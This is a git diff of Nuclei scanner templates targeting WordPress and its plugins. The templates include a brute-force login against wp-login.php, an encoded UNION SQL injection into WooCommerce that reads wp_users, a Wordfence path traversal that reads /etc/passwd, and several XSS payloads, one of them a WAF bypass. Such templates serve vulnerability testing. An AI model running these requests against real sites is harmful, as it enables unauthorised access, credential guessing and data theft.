b/poc/wordpress/wordpress-weak-credentials-11336.yaml new file mode 100644 index 0000000000..a4747ae6ab --- /dev/null +++ b/poc/wordpress/wordpress-weak-credentials-11336.yaml @@ -0,0 +1,43 @@ +id: wordpress-weak-credentials +info: + name: WordPress - Weak Credentials + author: evolutionsec + severity: critical + description: | + Weak WordPress Credentials were discovered. + reference: + - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + tags: wordpress,default-login,fuzz +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + log={{users}}&pwd={{passwords}} + payloads: + users: helpers/wordlists/wp-users.txt + passwords: helpers/wordlists/wp-passwords.txt + threads: 50 + attack: clusterbomb + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - '/wp-admin' + - 'wordpress_logged_in' + condition: and + - type: status + status: + - 302 + +# Enhanced by mp on 2022/05/19 diff --git a/poc/wordpress/wordpress-weak-credentials-11337.yaml b/poc/wordpress/wordpress-weak-credentials-11337.yaml deleted file mode 100644 index 0bec5f6f85..0000000000 --- a/poc/wordpress/wordpress-weak-credentials-11337.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: wordpress-weak-credentials - -info: - name: WordPress Weak Credentials - author: evolutionsec - severity: critical - tags: wordpress,default-login,fuzz - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}} - - log={{users}}&pwd={{passwords}} - - payloads: - users: helpers/wordlists/wp-users.txt - passwords: helpers/wordlists/wp-passwords.txt - threads: 50 - attack: clusterbomb - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 302 - - - type: word - words: - - '/wp-admin' - - 'wordpress_logged_in' - condition: and - part: header \ No newline at end of file diff --git a/poc/wordpress/wordpress-weak-credentials.yaml b/poc/wordpress/wordpress-weak-credentials.yaml index a4747ae6ab..9b2b887072 100644 --- a/poc/wordpress/wordpress-weak-credentials.yaml +++ b/poc/wordpress/wordpress-weak-credentials.yaml @@ -1,4 +1,5 @@ id: wordpress-weak-credentials + info: name: WordPress - Weak Credentials author: evolutionsec @@ -8,11 +9,14 @@ info: reference: - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cwe-id: CWE-522 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cwe-id: CWE-1391 + metadata: + max-request: 276 tags: wordpress,default-login,fuzz -requests: + +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -22,12 +26,14 @@ requests: Referer: {{BaseURL}} log={{users}}&pwd={{passwords}} + payloads: users: helpers/wordlists/wp-users.txt passwords: helpers/wordlists/wp-passwords.txt threads: 50 attack: clusterbomb stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -36,8 +42,9 @@ requests: - '/wp-admin' - 'wordpress_logged_in' condition: and + - type: status status: - 302 -# Enhanced by mp on 2022/05/19 +# digest: 490a0046304402206feaee39a07459925f48bcc9cadb2289ad56e2df23d9e1a6f44a5fec39b3e48d02202b1343c19604a13ccf017c07b3bffca05a5abe6fe91b604d99acf57af94797d2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-woocommerce-listing-11338.yaml b/poc/wordpress/wordpress-woocommerce-listing-11338.yaml index 300e671075..88dd79b5d6 100644 --- a/poc/wordpress/wordpress-woocommerce-listing-11338.yaml +++ b/poc/wordpress/wordpress-woocommerce-listing-11338.yaml @@ -2,11 +2,10 @@ id: wordpress-woocommerce-listing info: name: WordPress Woocommerce Plugin Directory Listing author: dhiyaneshDK - severity: info + severity: low description: Searches for sensitive directories present in the woocommerce wordpress plugin. - reference: - - https://www.exploit-db.com/ghdb/6192 - tags: wordpress,listing,plugin,woocommerce + reference: https://www.exploit-db.com/ghdb/6192 + tags: wordpress,listing requests: - method: GET path: diff --git a/poc/wordpress/wordpress-woocommerce-listing-11339.yaml b/poc/wordpress/wordpress-woocommerce-listing-11339.yaml deleted file mode 100644 index 41d380395c..0000000000 --- a/poc/wordpress/wordpress-woocommerce-listing-11339.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wordpress-woocommerce-listing -info: - name: WordPress Woocommerce Plugin Directory Listing - author: dhiyaneshDK - severity: info - description: Searches for sensitive directories present in the woocommerce wordpress plugin. - reference: https://www.exploit-db.com/ghdb/6192 - tags: wordpress,listing,plugin,woocommerce -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/woocommerce/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/wp-content/plugins/woocommerce/" - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-woocommerce-listing-11341.yaml b/poc/wordpress/wordpress-woocommerce-listing-11341.yaml new file mode 100644 index 0000000000..300e671075 --- /dev/null +++ b/poc/wordpress/wordpress-woocommerce-listing-11341.yaml @@ -0,0 +1,23 @@ +id: wordpress-woocommerce-listing +info: + name: WordPress Woocommerce Plugin Directory Listing + author: dhiyaneshDK + severity: info + description: Searches for sensitive directories present in the woocommerce wordpress plugin. + reference: + - https://www.exploit-db.com/ghdb/6192 + tags: wordpress,listing,plugin,woocommerce +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/woocommerce/" + condition: and + - type: status + status: + - 200 diff --git a/poc/wordpress/wordpress-woocommerce-sqli-11342.yaml b/poc/wordpress/wordpress-woocommerce-sqli-11342.yaml index 374d2b2e3f..81d422c278 100644 --- a/poc/wordpress/wordpress-woocommerce-sqli-11342.yaml +++ b/poc/wordpress/wordpress-woocommerce-sqli-11342.yaml @@ -3,8 +3,8 @@ info: name: Unauthenticated SQL injection Woocommerce author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot severity: critical - tags: wordpress,woocommerce,sqli,wp-plugin,injection - reference: + tags: wordpress,woocomernce,sqli,wp-plugin + reference: | - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx requests: @@ -18,8 +18,6 @@ requests: words: - 'sqli-test' - 'attribute_counts' - - 'price_range' - - 'term' condition: and - type: word words: diff --git a/poc/wordpress/wordpress-woocommerce-sqli-11345.yaml b/poc/wordpress/wordpress-woocommerce-sqli-11345.yaml deleted file mode 100644 index 711bde6e79..0000000000 --- a/poc/wordpress/wordpress-woocommerce-sqli-11345.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: wordpress-woocommerce-sqli - -info: - name: Woocommerce Unauthenticated SQL Injection - author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot - severity: critical - description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability. - tags: wordpress,woocommerce,sqli,wp-plugin,injection - reference: - - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx - - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: - cwe-id: CWE-89 - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' - - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' - - matchers-condition: and - matchers: - - type: word - words: - - 'sqli-test' - - 'attribute_counts' - - 'price_range' - - 'term' - condition: and - - - type: word - words: - - 'application/json' - part: header - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/21 diff --git a/poc/wordpress/wordpress-woosidebars.yaml b/poc/wordpress/wordpress-woosidebars.yaml deleted file mode 100644 index 70a6912ff6..0000000000 --- a/poc/wordpress/wordpress-woosidebars.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: wordpress-woosidebars - -info: - name: WooSidebars Detection - author: ricardomaia - severity: info - reference: - - https://wordpress.org/plugins/woosidebars/ - metadata: - plugin_namespace: woosidebars - wpscan: https://wpscan.com/plugin/woosidebars - tags: tech,wordpress,wp-plugin,top-200 - -requests: - - method: GET - - path: - - "{{BaseURL}}/wp-content/plugins/woosidebars/readme.txt" - - payloads: - last_version: helpers/wordpress/plugins/woosidebars.txt - - extractors: - - type: regex - part: body - internal: true - name: internal_detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - - type: regex - part: body - name: detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - matchers-condition: or - matchers: - - type: dsl - name: "outdated_version" - dsl: - - compare_versions(internal_detected_version, concat("< ", last_version)) - - - type: regex - part: body - regex: - - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/poc/wordpress/wordpress-wordfence-lfi-11346.yaml b/poc/wordpress/wordpress-wordfence-lfi-11346.yaml new file mode 100644 index 0000000000..a7d8606021 --- /dev/null +++ b/poc/wordpress/wordpress-wordfence-lfi-11346.yaml @@ -0,0 +1,21 @@ +id: wordpress-wordfence-lfi +info: + name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure + author: 0x_Akoko + severity: high + reference: | + - https://www.exploit-db.com/exploits/48061 + - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/ + tags: wordpress,wp-plugin,lfi,wordfence +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/poc/wordpress/wordpress-wordfence-lfi-11348.yaml b/poc/wordpress/wordpress-wordfence-lfi-11348.yaml index 3fdc257d5c..c716a16c18 100644 --- a/poc/wordpress/wordpress-wordfence-lfi-11348.yaml +++ b/poc/wordpress/wordpress-wordfence-lfi-11348.yaml @@ -1,6 +1,6 @@ id: wordpress-wordfence-lfi info: - name: Wordpress Wordfence 7.4.5 - Arbitrary File Retrieval + name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure author: 0x_Akoko severity: high reference: @@ -15,7 +15,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 diff --git a/poc/wordpress/wordpress-wordfence-lfi-11350.yaml b/poc/wordpress/wordpress-wordfence-lfi-11350.yaml deleted file mode 100644 index c716a16c18..0000000000 --- a/poc/wordpress/wordpress-wordfence-lfi-11350.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: wordpress-wordfence-lfi -info: - name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure - author: 0x_Akoko - severity: high - reference: - - https://www.exploit-db.com/exploits/48061 - - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/ - tags: wordpress,wp-plugin,lfi,wordfence -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml index d87d24ddb6..884e9b2f03 100644 --- a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml +++ b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml @@ -1,39 +1,24 @@ id: wordpress-wordfence-waf-bypass-xss - info: - name: Wordpress Wordfence - Cross-Site Scripting author: hackergautam + name: Wordfence WAF Bypass WordPress XSS + reference: https://twitter.com/naglinagli/status/1382082473744564226 severity: medium - description: Wordpress Wordfence is vulnerable to cross-site scripting. - reference: - - https://twitter.com/naglinagli/status/1382082473744564226 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cwe-id: CWE-80 - metadata: - max-request: 1 - tags: wordpress,wordfence,xss,bypass - -http: + tags: wordpress,wordfence,xss +requests: - method: GET path: - "{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6" - matchers-condition: and matchers: - type: word words: - <script>alert(document.domain)</script> part: body - - type: word part: header words: - text/html - - type: status status: - 200 - -# digest: 4a0a0047304502203bf332bad88b42bad13753e7b75eb53d71765c488f687a0e4debdee14d9f9abd022100ba222adbe24edb0c96da975357596ae7e3a3b3254eb2fb598e12817108d5638f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml index 6f3cc78548..ef0527d5a1 100644 --- a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml +++ b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml @@ -1,9 +1,10 @@ id: wordpress-wordfence-waf-bypass-xss info: + name: Wordpress Wordfence WAF - Cross-Site Scripting author: hackergautam - name: Wordfence WAF Bypass WordPress XSS - reference: https://twitter.com/naglinagli/status/1382082473744564226 severity: medium + reference: + - https://twitter.com/naglinagli/status/1382082473744564226 tags: wordpress,wordfence,xss,bypass requests: - method: GET diff --git a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml deleted file mode 100644 index ef0527d5a1..0000000000 --- a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wordpress-wordfence-waf-bypass-xss -info: - name: Wordpress Wordfence WAF - Cross-Site Scripting - author: hackergautam - severity: medium - reference: - - https://twitter.com/naglinagli/status/1382082473744564226 - tags: wordpress,wordfence,xss,bypass -requests: - - method: GET - path: - - "{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6" - matchers-condition: and - matchers: - - type: word - words: - - <script>alert(document.domain)</script> - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-wordfence-xss-11359.yaml b/poc/wordpress/wordpress-wordfence-xss-11359.yaml index 5bae09492e..4a9a1ee7e9 100644 --- a/poc/wordpress/wordpress-wordfence-xss-11359.yaml +++ b/poc/wordpress/wordpress-wordfence-xss-11359.yaml @@ -1,13 +1,16 @@ id: wordpress-wordfence-xss + info: name: WordPress Wordfence 7.4.6 Cross Site Scripting author: madrobot severity: medium - tags: wordpress,wp-plugin,xss,wordfence + tags: wordpress,wp-plugin,xss + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E" + matchers-condition: and matchers: - type: word @@ -18,6 +21,7 @@ requests: words: - "text/html" part: header + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/wordpress/wordpress-workflow-11363.yaml b/poc/wordpress/wordpress-workflow-11363.yaml deleted file mode 100644 index e7ce984db9..0000000000 --- a/poc/wordpress/wordpress-workflow-11363.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: wordpress-workflow -info: - name: Wordpress Security Checks - author: kiblyn11,zomsop82 - description: A simple workflow that runs all wordpress related nuclei templates on a given target. - tags: workflow - -workflows: - - - template: technologies/tech-detect.yaml - matchers: - - name: wordpress - subtemplates: - - tags: wordpress \ No newline at end of file diff --git a/poc/wordpress/wordpress-workflow-11365.yaml b/poc/wordpress/wordpress-workflow-11365.yaml new file mode 100644 index 0000000000..24f7035973 --- /dev/null +++ b/poc/wordpress/wordpress-workflow-11365.yaml @@ -0,0 +1,29 @@ +id: wordpress-workflow +info: + name: Wordpress Security Checks + author: foulenzer + description: A simple workflow that runs all wordpress related nuclei templates on a given target. + + # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) + # Old workflows still remains valid, and will be working with all nuclei versions. + +workflows: + + - template: /root/foulenzer-templates/wp-detect.yaml + matchers: + - name: wordpress + subtemplates: + - template: cves/2019/CVE-2019-15858.yaml + - template: cves/2019/CVE-2019-6715.yaml + - template: cves/2019/CVE-2019-9978.yaml + - template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml + - template: vulnerabilities/wordpress/sassy-social-share.yaml + - template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml + - template: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml + - template: vulnerabilities/wordpress/wordpress-db-backup.yaml + - template: vulnerabilities/wordpress/wordpress-debug-log.yaml + - template: vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml + - template: vulnerabilities/wordpress/wordpress-emergency-script.yaml + - template: vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml + - template: vulnerabilities/wordpress/wordpress-wordfence-xss.yaml + - template: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml \ No newline at end of file diff --git a/poc/wordpress/wordpress-workflow.yaml b/poc/wordpress/wordpress-workflow.yaml index 24f7035973..e7ce984db9 100644 --- a/poc/wordpress/wordpress-workflow.yaml +++ b/poc/wordpress/wordpress-workflow.yaml @@ -1,29 +1,14 @@ id: wordpress-workflow info: name: Wordpress Security Checks - author: foulenzer + author: kiblyn11,zomsop82 description: A simple workflow that runs all wordpress related nuclei templates on a given target. - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. + tags: workflow workflows: - - template: /root/foulenzer-templates/wp-detect.yaml + - template: technologies/tech-detect.yaml matchers: - name: wordpress subtemplates: - - template: cves/2019/CVE-2019-15858.yaml - - template: cves/2019/CVE-2019-6715.yaml - - template: cves/2019/CVE-2019-9978.yaml - - template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml - - template: vulnerabilities/wordpress/sassy-social-share.yaml - - template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml - - template: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml - - template: vulnerabilities/wordpress/wordpress-db-backup.yaml - - template: vulnerabilities/wordpress/wordpress-debug-log.yaml - - template: vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml - - template: vulnerabilities/wordpress/wordpress-emergency-script.yaml - - template: vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml - - template: vulnerabilities/wordpress/wordpress-wordfence-xss.yaml - - template: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml \ No newline at end of file + - tags: wordpress \ No newline at end of file diff --git a/poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml b/poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml new file mode 100644 index 0000000000..7e24d990b5 --- /dev/null +++ b/poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml @@ -0,0 +1,34 @@ +id: wordpress-wpcourses-info-disclosure + +info: + name: WordPress WP Courses Plugin Information Disclosure + author: dwisiswant0 + severity: high + description: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials + tags: wordpress,plugin + + # References: + # - [1] https://www.exploit-db.com/exploits/48910 + # - [2] https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-json/wp/v2/lesson/1" + matchers-condition: and + matchers: + - type: regex + regex: + - "rest_post_invalid_id" + - "\"(guid|title|content|excerpt)\":{\"rendered\":" + condition: or + part: body + - type: word + words: + - "application/json" + part: header + - type: status + status: + - 200 + - 404 + condition: or \ No newline at end of file diff --git a/poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml b/poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml deleted file mode 100644 index 4a0d110f9c..0000000000 --- a/poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: wordpress-wpcourses-info-disclosure - -info: - name: WordPress WP Courses Plugin Information Disclosure - author: dwisiswant0 - severity: high - description: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials - tags: wordpress,plugin - reference: - - https://www.exploit-db.com/exploits/48910 - - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-json/wp/v2/lesson/1" - - matchers-condition: and - matchers: - - type: regex - regex: - - "rest_post_invalid_id" - - "\"(guid|title|content|excerpt)\":{\"rendered\":" - condition: or - part: body - - - type: word - words: - - "application/json" - part: header - - - type: status - status: - - 200 - - 404 - condition: or \ No newline at end of file diff --git a/poc/wordpress/wordpress-wpcourses-info-disclosure.yaml b/poc/wordpress/wordpress-wpcourses-info-disclosure.yaml index 129d6c6741..4a0d110f9c 100644 --- a/poc/wordpress/wordpress-wpcourses-info-disclosure.yaml +++ b/poc/wordpress/wordpress-wpcourses-info-disclosure.yaml @@ -1,17 +1,20 @@ id: wordpress-wpcourses-info-disclosure + info: name: WordPress WP Courses Plugin Information Disclosure author: dwisiswant0 severity: high description: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials tags: wordpress,plugin - # References: - # - [1] https://www.exploit-db.com/exploits/48910 - # - [2] https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ + reference: + - https://www.exploit-db.com/exploits/48910 + - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ + requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/lesson/1" + matchers-condition: and matchers: - type: regex @@ -20,12 +23,14 @@ requests: - "\"(guid|title|content|excerpt)\":{\"rendered\":" condition: or part: body + - type: word words: - "application/json" part: header + - type: status status: - 200 - 404 - condition: or + condition: or \ No newline at end of file diff --git a/poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml b/poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml deleted file mode 100644 index 612495b0a8..0000000000 --- a/poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: wordpress-xmlrpc-listmethods -info: - name: Wordpress XML-RPC List System Methods - author: 0ut0fb4nd - severity: info - tags: wordpress -requests: - - method: POST - path: - - "{{BaseURL}}/xmlrpc.php" - body: "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "system.multicall" - - "system.listMethods" - - "demo.sayHello" - condition: and - part: body diff --git a/poc/wordpress/wordpress-xmlrpc-listmethods.yaml b/poc/wordpress/wordpress-xmlrpc-listmethods-11374.yaml similarity index 100% rename from poc/wordpress/wordpress-xmlrpc-listmethods.yaml rename to poc/wordpress/wordpress-xmlrpc-listmethods-11374.yaml diff --git a/poc/wordpress/wordpress-zebra-form-xss-11378.yaml b/poc/wordpress/wordpress-zebra-form-xss-11378.yaml deleted file mode 100644 index a36ec88196..0000000000 --- a/poc/wordpress/wordpress-zebra-form-xss-11378.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: wordpress-zebra-form-xss -info: - name: Wordpress Zebra Form XSS - author: madrobot - severity: medium - reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html - tags: wordpress,xss -requests: - - raw: - - | - POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate - Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 - Content-Length: 241 - Origin: null - Connection: close - Upgrade-Insecure-Requests: 1 - - -----------------------------77916619616724262872902741074 - Content-Disposition: form-data; name="upload"; filename="a.txt" - Content-Type: text/plain - Test - -----------------------------77916619616724262872902741074-- - matchers-condition: and - matchers: - - type: word - words: - - "</script><img src onerror=alert(/XSS-form/)>" - part: body - - type: status - status: - - 200 - - type: word - words: - - "text/html" - part: header diff --git a/poc/wordpress/wordpress-zebra-form-xss-11379.yaml b/poc/wordpress/wordpress-zebra-form-xss-11379.yaml new file mode 100644 index 0000000000..eb070bb0f2 --- /dev/null +++ b/poc/wordpress/wordpress-zebra-form-xss-11379.yaml @@ -0,0 +1,38 @@ +id: wordpress-zebra-form-xss + +info: + name: Wordpress Zebra Form XSS + author: madrobot + severity: medium + reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html + tags: wordpress,xss +requests: + - raw: + - | + POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 + Origin: null + + -----------------------------77916619616724262872902741074 + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt" + Content-Type: text/plain + Test + -----------------------------77916619616724262872902741074-- + + matchers-condition: and + matchers: + - type: word + words: + - "</script><img src onerror=alert(/XSS-form/)>" + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header \ No newline at end of file diff --git a/poc/wordpress/wordpress-zebra-form-xss.yaml b/poc/wordpress/wordpress-zebra-form-xss.yaml index eb070bb0f2..55d8de29c4 100644 --- a/poc/wordpress/wordpress-zebra-form-xss.yaml +++ b/poc/wordpress/wordpress-zebra-form-xss.yaml @@ -1,15 +1,26 @@ id: wordpress-zebra-form-xss info: - name: Wordpress Zebra Form XSS + name: Zebra_Form PHP Library <= 2.9.8 - Cross-Site Scripting author: madrobot severity: medium - reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html - tags: wordpress,xss -requests: + description: | + Zebra_Form PHP library 2.9.8 and prior (which is used by some WordPress plugins) is affected by reflected cross-site scripting vulnerabilities via process.php. + reference: + - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html + - https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 + metadata: + max-request: 1 + tags: wordpress,xss,wp,wpscan,intrusive + +http: - raw: - | - POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 + POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&control=upload HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 @@ -24,15 +35,17 @@ requests: matchers-condition: and matchers: - type: word - words: - - "</script><img src onerror=alert(/XSS-form/)>" part: body + words: + - "</script><img src onerror=alert(document.domain)>" + + - type: word + part: header + words: + - "text/html" - type: status status: - 200 - - type: word - words: - - "text/html" - part: header \ No newline at end of file +# digest: 4a0a00473045022100c03ef41c0ba961c72164701241b78da8d638eb78bb78c0169c5e649bdc9945b80220262a4dc87375607046a19c874994d591e04ead2b1f9e34a1ba678283b1f70eb1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress.yaml b/poc/wordpress/wordpress.yaml new file mode 100644 index 0000000000..9202790171 --- /dev/null +++ b/poc/wordpress/wordpress.yaml @@ -0,0 +1,52062 @@ +id: wordpress +info: + name: wordpress_version_fingerprint + severity: info + author: glatisant & erwan +requests: + - method: GET + path: + - "{{BaseURL}}/readme.html" + matchers: + - type: dsl + name: 4.7.8 - 4.9.4 + dsl: + - "(\"092b5391da31c6e8bb02bf4bc03b6b34\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.7 + dsl: + - "(\"fe8cf5b25298130f1b2ed912a5809e33\" == md5(body))" + - type: dsl + name: 